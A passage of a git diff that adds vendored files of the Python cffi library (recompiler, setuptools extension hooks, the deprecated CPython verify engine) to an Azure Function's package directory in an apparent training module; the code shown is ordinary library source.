check that %s is an integer type */\n' + ' ) <= 0)' % (tp.name, tp.name, tp.name)) + self.cffi_types[index] = CffiOp(OP_PRIMITIVE, s) + + def _emit_bytecode_UnknownFloatType(self, tp, index): + s = ('_cffi_prim_float(sizeof(%s) *\n' + ' (((%s)1) / 2) * 2 /* integer => 0, float => 1 */\n' + ' )' % (tp.name, tp.name)) + self.cffi_types[index] = CffiOp(OP_PRIMITIVE, s) + + def _emit_bytecode_RawFunctionType(self, tp, index): + self.cffi_types[index] = CffiOp(OP_FUNCTION, self._typesdict[tp.result]) + index += 1 + for tp1 in tp.args: + realindex = self._typesdict[tp1] + if index != realindex: + if isinstance(tp1, model.PrimitiveType): + self._emit_bytecode_PrimitiveType(tp1, index) + else: + self.cffi_types[index] = CffiOp(OP_NOOP, realindex) + index += 1 + flags = int(tp.ellipsis) + if tp.abi is not None: + if tp.abi == '__stdcall': + flags |= 2 + else: + raise NotImplementedError("abi=%r" % (tp.abi,)) + self.cffi_types[index] = CffiOp(OP_FUNCTION_END, flags) + + def _emit_bytecode_PointerType(self, tp, index): + self.cffi_types[index] = CffiOp(OP_POINTER, self._typesdict[tp.totype]) + + _emit_bytecode_ConstPointerType = _emit_bytecode_PointerType + _emit_bytecode_NamedPointerType = _emit_bytecode_PointerType + + def _emit_bytecode_FunctionPtrType(self, tp, index): + raw = tp.as_raw_function() + self.cffi_types[index] = CffiOp(OP_POINTER, self._typesdict[raw]) + + def _emit_bytecode_ArrayType(self, tp, index): + item_index = self._typesdict[tp.item] + if tp.length is None: + self.cffi_types[index] = CffiOp(OP_OPEN_ARRAY, item_index) + elif tp.length == '...': + raise VerificationError( + "type %s badly placed: the '...' array length can only be " + "used on global arrays or on fields of structures" % ( + str(tp).replace('/*...*/', '...'),)) + else: + assert self.cffi_types[index + 1] == 'LEN' + self.cffi_types[index] = CffiOp(OP_ARRAY, item_index) + self.cffi_types[index + 1] = CffiOp(None, str(tp.length)) + + def _emit_bytecode_StructType(self, tp, index): + struct_index = self._struct_unions[tp] + self.cffi_types[index] = CffiOp(OP_STRUCT_UNION, struct_index) + _emit_bytecode_UnionType = _emit_bytecode_StructType + + def _emit_bytecode_EnumType(self, tp, index): + enum_index = self._enums[tp] + self.cffi_types[index] = CffiOp(OP_ENUM, enum_index) + + +if sys.version_info >= (3,): + NativeIO = io.StringIO +else: + class NativeIO(io.BytesIO): + def write(self, s): + if isinstance(s, unicode): + s = s.encode('ascii') + super(NativeIO, self).write(s) + +def _make_c_or_py_source(ffi, module_name, preamble, target_file, verbose): + if verbose: + print("generating %s" % (target_file,)) + recompiler = Recompiler(ffi, module_name, + target_is_python=(preamble is None)) + recompiler.collect_type_table() + recompiler.collect_step_tables() + f = NativeIO() + recompiler.write_source_to_f(f, preamble) + output = f.getvalue() + try: + with open(target_file, 'r') as f1: + if f1.read(len(output) + 1) != output: + raise IOError + if verbose: + print("(already up-to-date)") + return False # already up-to-date + except IOError: + tmp_file = '%s.~%d' % (target_file, os.getpid()) + with open(tmp_file, 'w') as f1: + f1.write(output) + try: + os.rename(tmp_file, target_file) + except OSError: + os.unlink(target_file) + os.rename(tmp_file, target_file) + return True + +def make_c_source(ffi, module_name, preamble, target_c_file, verbose=False): + assert preamble is not None + return _make_c_or_py_source(ffi, module_name, preamble, target_c_file, + verbose) + +def make_py_source(ffi, module_name, target_py_file, verbose=False): + return _make_c_or_py_source(ffi, module_name, None, target_py_file, + verbose) + +def _modname_to_file(outputdir, modname, extension): + parts = modname.split('.') + try: + os.makedirs(os.path.join(outputdir, *parts[:-1])) + except OSError: + pass + parts[-1] += extension + return os.path.join(outputdir, *parts), parts + + +# Aaargh. Distutils is not tested at all for the purpose of compiling +# DLLs that are not extension modules. Here are some hacks to work +# around that, in the _patch_for_*() functions... + +def _patch_meth(patchlist, cls, name, new_meth): + old = getattr(cls, name) + patchlist.append((cls, name, old)) + setattr(cls, name, new_meth) + return old + +def _unpatch_meths(patchlist): + for cls, name, old_meth in reversed(patchlist): + setattr(cls, name, old_meth) + +def _patch_for_embedding(patchlist): + if sys.platform == 'win32': + # we must not remove the manifest when building for embedding! + from distutils.msvc9compiler import MSVCCompiler + _patch_meth(patchlist, MSVCCompiler, '_remove_visual_c_ref', + lambda self, manifest_file: manifest_file) + + if sys.platform == 'darwin': + # we must not make a '-bundle', but a '-dynamiclib' instead + from distutils.ccompiler import CCompiler + def my_link_shared_object(self, *args, **kwds): + if '-bundle' in self.linker_so: + self.linker_so = list(self.linker_so) + i = self.linker_so.index('-bundle') + self.linker_so[i] = '-dynamiclib' + return old_link_shared_object(self, *args, **kwds) + old_link_shared_object = _patch_meth(patchlist, CCompiler, + 'link_shared_object', + my_link_shared_object) + +def _patch_for_target(patchlist, target): + from distutils.command.build_ext import build_ext + # if 'target' is different from '*', we need to patch some internal + # method to just return this 'target' value, instead of having it + # built from module_name + if target.endswith('.*'): + target = target[:-2] + if sys.platform == 'win32': + target += '.dll' + elif sys.platform == 'darwin': + target += '.dylib' + else: + target += '.so' + _patch_meth(patchlist, build_ext, 'get_ext_filename', + lambda self, ext_name: target) + + +def recompile(ffi, module_name, preamble, tmpdir='.', call_c_compiler=True, + c_file=None, source_extension='.c', extradir=None, + compiler_verbose=1, target=None, debug=None, **kwds): + if not isinstance(module_name, str): + module_name = module_name.encode('ascii') + if ffi._windows_unicode: + ffi._apply_windows_unicode(kwds) + if preamble is not None: + embedding = (ffi._embedding is not None) + if embedding: + ffi._apply_embedding_fix(kwds) + if c_file is None: + c_file, parts = _modname_to_file(tmpdir, module_name, + source_extension) + if extradir: + parts = [extradir] + parts + ext_c_file = os.path.join(*parts) + else: + ext_c_file = c_file + # + if target is None: + if embedding: + target = '%s.*' % module_name + else: + target = '*' + # + ext = ffiplatform.get_extension(ext_c_file, module_name, **kwds) + updated = make_c_source(ffi, module_name, preamble, c_file, + verbose=compiler_verbose) + if call_c_compiler: + patchlist = [] + cwd = os.getcwd() + try: + if embedding: + _patch_for_embedding(patchlist) + if target != '*': + _patch_for_target(patchlist, target) + if compiler_verbose: + if tmpdir == '.': + msg = 'the current directory is' + else: + msg = 'setting the current directory to' + print('%s %r' % (msg, os.path.abspath(tmpdir))) + os.chdir(tmpdir) + outputfilename = ffiplatform.compile('.', ext, + compiler_verbose, debug) + finally: + os.chdir(cwd) + _unpatch_meths(patchlist) + return outputfilename + else: + return ext, updated + else: + if c_file is None: + c_file, _ = _modname_to_file(tmpdir, module_name, '.py') + updated = make_py_source(ffi, module_name, c_file, + verbose=compiler_verbose) + if call_c_compiler: + return c_file + else: + return None, updated + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/setuptools_ext.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/setuptools_ext.py new file mode 100644 index 0000000..5df6494 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/setuptools_ext.py @@ -0,0 +1,219 @@ +import os +import sys + +try: + basestring +except NameError: + # Python 3.x + basestring = str + +def error(msg): + from distutils.errors import DistutilsSetupError + raise DistutilsSetupError(msg) + + +def execfile(filename, glob): + # We use execfile() (here rewritten for Python 3) instead of + # __import__() to load the build script. The problem with + # a normal import is that in some packages, the intermediate + # __init__.py files may already try to import the file that + # we are generating. + with open(filename) as f: + src = f.read() + src += '\n' # Python 2.6 compatibility + code = compile(src, filename, 'exec') + exec(code, glob, glob) + + +def add_cffi_module(dist, mod_spec): + from cffi.api import FFI + + if not isinstance(mod_spec, basestring): + error("argument to 'cffi_modules=...' must be a str or a list of str," + " not %r" % (type(mod_spec).__name__,)) + mod_spec = str(mod_spec) + try: + build_file_name, ffi_var_name = mod_spec.split(':') + except ValueError: + error("%r must be of the form 'path/build.py:ffi_variable'" % + (mod_spec,)) + if not os.path.exists(build_file_name): + ext = '' + rewritten = build_file_name.replace('.', '/') + '.py' + if os.path.exists(rewritten): + ext = ' (rewrite cffi_modules to [%r])' % ( + rewritten + ':' + ffi_var_name,) + error("%r does not name an existing file%s" % (build_file_name, ext)) + + mod_vars = {'__name__': '__cffi__', '__file__': build_file_name} + execfile(build_file_name, mod_vars) + + try: + ffi = mod_vars[ffi_var_name] + except KeyError: + error("%r: object %r not found in module" % (mod_spec, + ffi_var_name)) + if not isinstance(ffi, FFI): + ffi = ffi() # maybe it's a function instead of directly an ffi + if not isinstance(ffi, FFI): + error("%r is not an FFI instance (got %r)" % (mod_spec, + type(ffi).__name__)) + if not hasattr(ffi, '_assigned_source'): + error("%r: the set_source() method was not called" % (mod_spec,)) + module_name, source, source_extension, kwds = ffi._assigned_source + if ffi._windows_unicode: + kwds = kwds.copy() + ffi._apply_windows_unicode(kwds) + + if source is None: + _add_py_module(dist, ffi, module_name) + else: + _add_c_module(dist, ffi, module_name, source, source_extension, kwds) + +def _set_py_limited_api(Extension, kwds): + """ + Add py_limited_api to kwds if setuptools >= 26 is in use. + Do not alter the setting if it already exists. + Setuptools takes care of ignoring the flag on Python 2 and PyPy. + + CPython itself should ignore the flag in a debugging version + (by not listing .abi3.so in the extensions it supports), but + it doesn't so far, creating troubles. That's why we check + for "not hasattr(sys, 'gettotalrefcount')" (the 2.7 compatible equivalent + of 'd' not in sys.abiflags). (http://bugs.python.org/issue28401) + + On Windows, with CPython <= 3.4, it's better not to use py_limited_api + because virtualenv *still* doesn't copy PYTHON3.DLL on these versions. + Recently (2020) we started shipping only >= 3.5 wheels, though. So + we'll give it another try and set py_limited_api on Windows >= 3.5. + """ + from cffi import recompiler + + if ('py_limited_api' not in kwds and not hasattr(sys, 'gettotalrefcount') + and recompiler.USE_LIMITED_API): + import setuptools + try: + setuptools_major_version = int(setuptools.__version__.partition('.')[0]) + if setuptools_major_version >= 26: + kwds['py_limited_api'] = True + except ValueError: # certain development versions of setuptools + # If we don't know the version number of setuptools, we + # try to set 'py_limited_api' anyway. At worst, we get a + # warning. + kwds['py_limited_api'] = True + return kwds + +def _add_c_module(dist, ffi, module_name, source, source_extension, kwds): + from distutils.core import Extension + # We are a setuptools extension. Need this build_ext for py_limited_api. + from setuptools.command.build_ext import build_ext + from distutils.dir_util import mkpath + from distutils import log + from cffi import recompiler + + allsources = ['$PLACEHOLDER'] + allsources.extend(kwds.pop('sources', [])) + kwds = _set_py_limited_api(Extension, kwds) + ext = Extension(name=module_name, sources=allsources, **kwds) + + def make_mod(tmpdir, pre_run=None): + c_file = os.path.join(tmpdir, module_name + source_extension) + log.info("generating cffi module %r" % c_file) + mkpath(tmpdir) + # a setuptools-only, API-only hook: called with the "ext" and "ffi" + # arguments just before we turn the ffi into C code. To use it, + # subclass the 'distutils.command.build_ext.build_ext' class and + # add a method 'def pre_run(self, ext, ffi)'. + if pre_run is not None: + pre_run(ext, ffi) + updated = recompiler.make_c_source(ffi, module_name, source, c_file) + if not updated: + log.info("already up-to-date") + return c_file + + if dist.ext_modules is None: + dist.ext_modules = [] + dist.ext_modules.append(ext) + + base_class = dist.cmdclass.get('build_ext', build_ext) + class build_ext_make_mod(base_class): + def run(self): + if ext.sources[0] == '$PLACEHOLDER': + pre_run = getattr(self, 'pre_run', None) + ext.sources[0] = make_mod(self.build_temp, pre_run) + base_class.run(self) + dist.cmdclass['build_ext'] = build_ext_make_mod + # NB. multiple runs here will create multiple 'build_ext_make_mod' + # classes. Even in this case the 'build_ext' command should be + # run once; but just in case, the logic above does nothing if + # called again. + + +def _add_py_module(dist, ffi, module_name): + from distutils.dir_util import mkpath + from setuptools.command.build_py import build_py + from setuptools.command.build_ext import build_ext + from distutils import log + from cffi import recompiler + + def generate_mod(py_file): + log.info("generating cffi module %r" % py_file) + mkpath(os.path.dirname(py_file)) + updated = recompiler.make_py_source(ffi, module_name, py_file) + if not updated: + log.info("already up-to-date") + + base_class = dist.cmdclass.get('build_py', build_py) + class build_py_make_mod(base_class): + def run(self): + base_class.run(self) + module_path = module_name.split('.') + module_path[-1] += '.py' + generate_mod(os.path.join(self.build_lib, *module_path)) + def get_source_files(self): + # This is called from 'setup.py sdist' only. Exclude + # the generate .py module in this case. + saved_py_modules = self.py_modules + try: + if saved_py_modules: + self.py_modules = [m for m in saved_py_modules + if m != module_name] + return base_class.get_source_files(self) + finally: + self.py_modules = saved_py_modules + dist.cmdclass['build_py'] = build_py_make_mod + + # distutils and setuptools have no notion I could find of a + # generated python module. If we don't add module_name to + # dist.py_modules, then things mostly work but there are some + # combination of options (--root and --record) that will miss + # the module. So we add it here, which gives a few apparently + # harmless warnings about not finding the file outside the + # build directory. + # Then we need to hack more in get_source_files(); see above. + if dist.py_modules is None: + dist.py_modules = [] + dist.py_modules.append(module_name) + + # the following is only for "build_ext -i" + base_class_2 = dist.cmdclass.get('build_ext', build_ext) + class build_ext_make_mod(base_class_2): + def run(self): + base_class_2.run(self) + if self.inplace: + # from get_ext_fullpath() in distutils/command/build_ext.py + module_path = module_name.split('.') + package = '.'.join(module_path[:-1]) + build_py = self.get_finalized_command('build_py') + package_dir = build_py.get_package_dir(package) + file_name = module_path[-1] + '.py' + generate_mod(os.path.join(package_dir, file_name)) + dist.cmdclass['build_ext'] = build_ext_make_mod + +def cffi_modules(dist, attr, value): + assert attr == 'cffi_modules' + if isinstance(value, basestring): + value = [value] + + for cffi_module in value: + add_cffi_module(dist, cffi_module) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/vengine_cpy.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/vengine_cpy.py new file mode 100644 index 0000000..8c26db0 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/vengine_cpy.py @@ -0,0 +1,1076 @@ +# +# DEPRECATED: implementation for ffi.verify() +# +import sys, imp +from . import model +from .error import VerificationError + + +class VCPythonEngine(object): + _class_key = 'x' + _gen_python_module = True + + def __init__(self, verifier): + self.verifier = verifier + self.ffi = verifier.ffi + self._struct_pending_verification = {} + self._types_of_builtin_functions = {} + + def patch_extension_kwds(self, kwds): + pass + + def find_module(self, module_name, path, so_suffixes): + try: + f, filename, descr = imp.find_module(module_name, path) + except ImportError: + return None + if f is not None: + f.close() + # Note that after a setuptools installation, there are both .py + # and .so files with the same basename. The code here relies on + # imp.find_module() locating the .so in priority. + if descr[0] not in so_suffixes: + return None + return filename + + def collect_types(self): + self._typesdict = {} + self._generate("collecttype") + + def _prnt(self, what=''): + self._f.write(what + '\n') + + def _gettypenum(self, type): + # a KeyError here is a bug. please report it! :-) + return self._typesdict[type] + + def _do_collect_type(self, tp): + if ((not isinstance(tp, model.PrimitiveType) + or tp.name == 'long double') + and tp not in self._typesdict): + num = len(self._typesdict) + self._typesdict[tp] = num + + def write_source_to_f(self): + self.collect_types() + # + # The new module will have a _cffi_setup() function that receives + # objects from the ffi world, and that calls some setup code in + # the module. This setup code is split in several independent + # functions, e.g. one per constant. The functions are "chained" + # by ending in a tail call to each other. + # + # This is further split in two chained lists, depending on if we + # can do it at import-time or if we must wait for _cffi_setup() to + # provide us with the objects. This is needed because we + # need the values of the enum constants in order to build the + # that we may have to pass to _cffi_setup(). + # + # The following two 'chained_list_constants' items contains + # the head of these two chained lists, as a string that gives the + # call to do, if any. + self._chained_list_constants = ['((void)lib,0)', '((void)lib,0)'] + # + prnt = self._prnt + # first paste some standard set of lines that are mostly '#define' + prnt(cffimod_header) + prnt() + # then paste the C source given by the user, verbatim. + prnt(self.verifier.preamble) + prnt() + # + # call generate_cpy_xxx_decl(), for every xxx found from + # ffi._parser._declarations. This generates all the functions. + self._generate("decl") + # + # implement the function _cffi_setup_custom() as calling the + # head of the chained list. + self._generate_setup_custom() + prnt() + # + # produce the method table, including the entries for the + # generated Python->C function wrappers, which are done + # by generate_cpy_function_method(). + prnt('static PyMethodDef _cffi_methods[] = {') + self._generate("method") + prnt(' {"_cffi_setup", _cffi_setup, METH_VARARGS, NULL},') + prnt(' {NULL, NULL, 0, NULL} /* Sentinel */') + prnt('};') + prnt() + # + # standard init. + modname = self.verifier.get_module_name() + constants = self._chained_list_constants[False] + prnt('#if PY_MAJOR_VERSION >= 3') + prnt() + prnt('static struct PyModuleDef _cffi_module_def = {') + prnt(' PyModuleDef_HEAD_INIT,') + prnt(' "%s",' % modname) + prnt(' NULL,') + prnt(' -1,') + prnt(' _cffi_methods,') + prnt(' NULL, NULL, NULL, NULL') + prnt('};') + prnt() + prnt('PyMODINIT_FUNC') + prnt('PyInit_%s(void)' % modname) + prnt('{') + prnt(' PyObject *lib;') + prnt(' lib = PyModule_Create(&_cffi_module_def);') + prnt(' if (lib == NULL)') + prnt(' return NULL;') + prnt(' if (%s < 0 || _cffi_init() < 0) {' % (constants,)) + prnt(' Py_DECREF(lib);') + prnt(' return NULL;') + prnt(' }') + prnt(' return lib;') + prnt('}') + prnt() + prnt('#else') + prnt() + prnt('PyMODINIT_FUNC') + prnt('init%s(void)' % modname) + prnt('{') + prnt(' PyObject *lib;') + prnt(' lib = Py_InitModule("%s", _cffi_methods);' % modname) + prnt(' if (lib == NULL)') + prnt(' return;') + prnt(' if (%s < 0 || _cffi_init() < 0)' % (constants,)) + prnt(' return;') + prnt(' return;') + prnt('}') + prnt() + prnt('#endif') + + def load_library(self, flags=None): + # XXX review all usages of 'self' here! + # import it as a new extension module + imp.acquire_lock() + try: + if hasattr(sys, "getdlopenflags"): + previous_flags = sys.getdlopenflags() + try: + if hasattr(sys, "setdlopenflags") and flags is not None: + sys.setdlopenflags(flags) + module = imp.load_dynamic(self.verifier.get_module_name(), + self.verifier.modulefilename) + except ImportError as e: + error = "importing %r: %s" % (self.verifier.modulefilename, e) + raise VerificationError(error) + finally: + if hasattr(sys, "setdlopenflags"): + sys.setdlopenflags(previous_flags) + finally: + imp.release_lock() + # + # call loading_cpy_struct() to get the struct layout inferred by + # the C compiler + self._load(module, 'loading') + # + # the C code will need the objects. Collect them in + # order in a list. + revmapping = dict([(value, key) + for (key, value) in self._typesdict.items()]) + lst = [revmapping[i] for i in range(len(revmapping))] + lst = list(map(self.ffi._get_cached_btype, lst)) + # + # build the FFILibrary class and instance and call _cffi_setup(). + # this will set up some fields like '_cffi_types', and only then + # it will invoke the chained list of functions that will really + # build (notably) the constant objects, as if they are + # pointers, and store them as attributes on the 'library' object. + class FFILibrary(object): + _cffi_python_module = module + _cffi_ffi = self.ffi + _cffi_dir = [] + def __dir__(self): + return FFILibrary._cffi_dir + list(self.__dict__) + library = FFILibrary() + if module._cffi_setup(lst, VerificationError, library): + import warnings + warnings.warn("reimporting %r might overwrite older definitions" + % (self.verifier.get_module_name())) + # + # finally, call the loaded_cpy_xxx() functions. This will perform + # the final adjustments, like copying the Python->C wrapper + # functions from the module to the 'library' object, and setting + # up the FFILibrary class with properties for the global C variables. + self._load(module, 'loaded', library=library) + module._cffi_original_ffi = self.ffi + module._cffi_types_of_builtin_funcs = self._types_of_builtin_functions + return library + + def _get_declarations(self): + lst = [(key, tp) for (key, (tp, qual)) in + self.ffi._parser._declarations.items()] + lst.sort() + return lst + + def _generate(self, step_name): + for name, tp in self._get_declarations(): + kind, realname = name.split(' ', 1) + try: + method = getattr(self, '_generate_cpy_%s_%s' % (kind, + step_name)) + except AttributeError: + raise VerificationError( + "not implemented in verify(): %r" % name) + try: + method(tp, realname) + except Exception as e: + model.attach_exception_info(e, name) + raise + + def _load(self, module, step_name, **kwds): + for name, tp in self._get_declarations(): + kind, realname = name.split(' ', 1) + method = getattr(self, '_%s_cpy_%s' % (step_name, kind)) + try: + method(tp, realname, module, **kwds) + except Exception as e: + model.attach_exception_info(e, name) + raise + + def _generate_nothing(self, tp, name): + pass + + def _loaded_noop(self, tp, name, module, **kwds): + pass + + # ---------- + + def _convert_funcarg_to_c(self, tp, fromvar, tovar, errcode): + extraarg = '' + if isinstance(tp, model.PrimitiveType): + if tp.is_integer_type() and tp.name != '_Bool': + converter = '_cffi_to_c_int' + extraarg = ', %s' % tp.name + else: + converter = '(%s)_cffi_to_c_%s' % (tp.get_c_name(''), + tp.name.replace(' ', '_')) + errvalue = '-1' + # + elif isinstance(tp, model.PointerType): + self._convert_funcarg_to_c_ptr_or_array(tp, fromvar, + tovar, errcode) + return + # + elif isinstance(tp, (model.StructOrUnion, model.EnumType)): + # a struct (not a struct pointer) as a function argument + self._prnt(' if (_cffi_to_c((char *)&%s, _cffi_type(%d), %s) < 0)' + % (tovar, self._gettypenum(tp), fromvar)) + self._prnt(' %s;' % errcode) + return + # + elif isinstance(tp, model.FunctionPtrType): + converter = '(%s)_cffi_to_c_pointer' % tp.get_c_name('') + extraarg = ', _cffi_type(%d)' % self._gettypenum(tp) + errvalue = 'NULL' + # + else: + raise NotImplementedError(tp) + # + self._prnt(' %s = %s(%s%s);' % (tovar, converter, fromvar, extraarg)) + self._prnt(' if (%s == (%s)%s && PyErr_Occurred())' % ( + tovar, tp.get_c_name(''), errvalue)) + self._prnt(' %s;' % errcode) + + def _extra_local_variables(self, tp, localvars, freelines): + if isinstance(tp, model.PointerType): + localvars.add('Py_ssize_t datasize') + localvars.add('struct _cffi_freeme_s *large_args_free = NULL') + freelines.add('if (large_args_free != NULL)' + ' _cffi_free_array_arguments(large_args_free);') + + def _convert_funcarg_to_c_ptr_or_array(self, tp, fromvar, tovar, errcode): + self._prnt(' datasize = _cffi_prepare_pointer_call_argument(') + self._prnt(' _cffi_type(%d), %s, (char **)&%s);' % ( + self._gettypenum(tp), fromvar, tovar)) + self._prnt(' if (datasize != 0) {') + self._prnt(' %s = ((size_t)datasize) <= 640 ? ' + 'alloca((size_t)datasize) : NULL;' % (tovar,)) + self._prnt(' if (_cffi_convert_array_argument(_cffi_type(%d), %s, ' + '(char **)&%s,' % (self._gettypenum(tp), fromvar, tovar)) + self._prnt(' datasize, &large_args_free) < 0)') + self._prnt(' %s;' % errcode) + self._prnt(' }') + + def _convert_expr_from_c(self, tp, var, context): + if isinstance(tp, model.PrimitiveType): + if tp.is_integer_type() and tp.name != '_Bool': + return '_cffi_from_c_int(%s, %s)' % (var, tp.name) + elif tp.name != 'long double': + return '_cffi_from_c_%s(%s)' % (tp.name.replace(' ', '_'), var) + else: + return '_cffi_from_c_deref((char *)&%s, _cffi_type(%d))' % ( + var, self._gettypenum(tp)) + elif isinstance(tp, (model.PointerType, model.FunctionPtrType)): + return '_cffi_from_c_pointer((char *)%s, _cffi_type(%d))' % ( + var, self._gettypenum(tp)) + elif isinstance(tp, model.ArrayType): + return '_cffi_from_c_pointer((char *)%s, _cffi_type(%d))' % ( + var, self._gettypenum(model.PointerType(tp.item))) + elif isinstance(tp, model.StructOrUnion): + if tp.fldnames is None: + raise TypeError("'%s' is used as %s, but is opaque" % ( + tp._get_c_name(), context)) + return '_cffi_from_c_struct((char *)&%s, _cffi_type(%d))' % ( + var, self._gettypenum(tp)) + elif isinstance(tp, model.EnumType): + return '_cffi_from_c_deref((char *)&%s, _cffi_type(%d))' % ( + var, self._gettypenum(tp)) + else: + raise NotImplementedError(tp) + + # ---------- + # typedefs: generates no code so far + + _generate_cpy_typedef_collecttype = _generate_nothing + _generate_cpy_typedef_decl = _generate_nothing + _generate_cpy_typedef_method = _generate_nothing + _loading_cpy_typedef = _loaded_noop + _loaded_cpy_typedef = _loaded_noop + + # ---------- + # function declarations + + def _generate_cpy_function_collecttype(self, tp, name): + assert isinstance(tp, model.FunctionPtrType) + if tp.ellipsis: + self._do_collect_type(tp) + else: + # don't call _do_collect_type(tp) in this common case, + # otherwise test_autofilled_struct_as_argument fails + for type in tp.args: + self._do_collect_type(type) + self._do_collect_type(tp.result) + + def _generate_cpy_function_decl(self, tp, name): + assert isinstance(tp, model.FunctionPtrType) + if tp.ellipsis: + # cannot support vararg functions better than this: check for its + # exact type (including the fixed arguments), and build it as a + # constant function pointer (no CPython wrapper) + self._generate_cpy_const(False, name, tp) + return + prnt = self._prnt + numargs = len(tp.args) + if numargs == 0: + argname = 'noarg' + elif numargs == 1: + argname = 'arg0' + else: + argname = 'args' + prnt('static PyObject *') + prnt('_cffi_f_%s(PyObject *self, PyObject *%s)' % (name, argname)) + prnt('{') + # + context = 'argument of %s' % name + for i, type in enumerate(tp.args): + prnt(' %s;' % type.get_c_name(' x%d' % i, context)) + # + localvars = set() + freelines = set() + for type in tp.args: + self._extra_local_variables(type, localvars, freelines) + for decl in sorted(localvars): + prnt(' %s;' % (decl,)) + # + if not isinstance(tp.result, model.VoidType): + result_code = 'result = ' + context = 'result of %s' % name + prnt(' %s;' % tp.result.get_c_name(' result', context)) + prnt(' PyObject *pyresult;') + else: + result_code = '' + # + if len(tp.args) > 1: + rng = range(len(tp.args)) + for i in rng: + prnt(' PyObject *arg%d;' % i) + prnt() + prnt(' if (!PyArg_ParseTuple(args, "%s:%s", %s))' % ( + 'O' * numargs, name, ', '.join(['&arg%d' % i for i in rng]))) + prnt(' return NULL;') + prnt() + # + for i, type in enumerate(tp.args): + self._convert_funcarg_to_c(type, 'arg%d' % i, 'x%d' % i, + 'return NULL') + prnt() + # + prnt(' Py_BEGIN_ALLOW_THREADS') + prnt(' _cffi_restore_errno();') + prnt(' { %s%s(%s); }' % ( + result_code, name, + ', '.join(['x%d' % i for i in range(len(tp.args))]))) + prnt(' _cffi_save_errno();') + prnt(' Py_END_ALLOW_THREADS') + prnt() + # + prnt(' (void)self; /* unused */') + if numargs == 0: + prnt(' (void)noarg; /* unused */') + if result_code: + prnt(' pyresult = %s;' % + self._convert_expr_from_c(tp.result, 'result', 'result type')) + for freeline in freelines: + prnt(' ' + freeline) + prnt(' return pyresult;') + else: + for freeline in freelines: + prnt(' ' + freeline) + prnt(' Py_INCREF(Py_None);') + prnt(' return Py_None;') + prnt('}') + prnt() + + def _generate_cpy_function_method(self, tp, name): + if tp.ellipsis: + return + numargs = len(tp.args) + if numargs == 0: + meth = 'METH_NOARGS' + elif numargs == 1: + meth = 'METH_O' + else: + meth = 'METH_VARARGS' + self._prnt(' {"%s", _cffi_f_%s, %s, NULL},' % (name, name, meth)) + + _loading_cpy_function = _loaded_noop + + def _loaded_cpy_function(self, tp, name, module, library): + if tp.ellipsis: + return + func = getattr(module, name) + setattr(library, name, func) + self._types_of_builtin_functions[func] = tp + + # ---------- + # named structs + + _generate_cpy_struct_collecttype = _generate_nothing + def _generate_cpy_struct_decl(self, tp, name): + assert name == tp.name + self._generate_struct_or_union_decl(tp, 'struct', name) + def _generate_cpy_struct_method(self, tp, name): + self._generate_struct_or_union_method(tp, 'struct', name) + def _loading_cpy_struct(self, tp, name, module): + self._loading_struct_or_union(tp, 'struct', name, module) + def _loaded_cpy_struct(self, tp, name, module, **kwds): + self._loaded_struct_or_union(tp) + + _generate_cpy_union_collecttype = _generate_nothing + def _generate_cpy_union_decl(self, tp, name): + assert name == tp.name + self._generate_struct_or_union_decl(tp, 'union', name) + def _generate_cpy_union_method(self, tp, name): + self._generate_struct_or_union_method(tp, 'union', name) + def _loading_cpy_union(self, tp, name, module): + self._loading_struct_or_union(tp, 'union', name, module) + def _loaded_cpy_union(self, tp, name, module, **kwds): + self._loaded_struct_or_union(tp) + + def _generate_struct_or_union_decl(self, tp, prefix, name): + if tp.fldnames is None: + return # nothing to do with opaque structs + checkfuncname = '_cffi_check_%s_%s' % (prefix, name) + layoutfuncname = '_cffi_layout_%s_%s' % (prefix, name) + cname = ('%s %s' % (prefix, name)).strip() + # + prnt = self._prnt + prnt('static void %s(%s *p)' % (checkfuncname, cname)) + prnt('{') + prnt(' /* only to generate compile-time warnings or errors */') + prnt(' (void)p;') + for fname, ftype, fbitsize, fqual in tp.enumfields(): + if (isinstance(ftype, model.PrimitiveType) + and ftype.is_integer_type()) or fbitsize >= 0: + # accept all integers, but complain on float or double + prnt(' (void)((p->%s) << 1);' % fname) + else: + # only accept exactly the type declared. + try: + prnt(' { %s = &p->%s; (void)tmp; }' % ( + ftype.get_c_name('*tmp', 'field %r'%fname, quals=fqual), + fname)) + except VerificationError as e: + prnt(' /* %s */' % str(e)) # cannot verify it, ignore + prnt('}') + prnt('static PyObject *') + prnt('%s(PyObject *self, PyObject *noarg)' % (layoutfuncname,)) + prnt('{') + prnt(' struct _cffi_aligncheck { char x; %s y; };' % cname) + prnt(' static Py_ssize_t nums[] = {') + prnt(' sizeof(%s),' % cname) + prnt(' offsetof(struct _cffi_aligncheck, y),') + for fname, ftype, fbitsize, fqual in tp.enumfields(): + if fbitsize >= 0: + continue # xxx ignore fbitsize for now + prnt(' offsetof(%s, %s),' % (cname, fname)) + if isinstance(ftype, model.ArrayType) and ftype.length is None: + prnt(' 0, /* %s */' % ftype._get_c_name()) + else: + prnt(' sizeof(((%s *)0)->%s),' % (cname, fname)) + prnt(' -1') + prnt(' };') + prnt(' (void)self; /* unused */') + prnt(' (void)noarg; /* unused */') + prnt(' return _cffi_get_struct_layout(nums);') + prnt(' /* the next line is not executed, but compiled */') + prnt(' %s(0);' % (checkfuncname,)) + prnt('}') + prnt() + + def _generate_struct_or_union_method(self, tp, prefix, name): + if tp.fldnames is None: + return # nothing to do with opaque structs + layoutfuncname = '_cffi_layout_%s_%s' % (prefix, name) + self._prnt(' {"%s", %s, METH_NOARGS, NULL},' % (layoutfuncname, + layoutfuncname)) + + def _loading_struct_or_union(self, tp, prefix, name, module): + if tp.fldnames is None: + return # nothing to do with opaque structs + layoutfuncname = '_cffi_layout_%s_%s' % (prefix, name) + # + function = getattr(module, layoutfuncname) + layout = function() + if isinstance(tp, model.StructOrUnion) and tp.partial: + # use the function()'s sizes and offsets to guide the + # layout of the struct + totalsize = layout[0] + totalalignment = layout[1] + fieldofs = layout[2::2] + fieldsize = layout[3::2] + tp.force_flatten() + assert len(fieldofs) == len(fieldsize) == len(tp.fldnames) + tp.fixedlayout = fieldofs, fieldsize, totalsize, totalalignment + else: + cname = ('%s %s' % 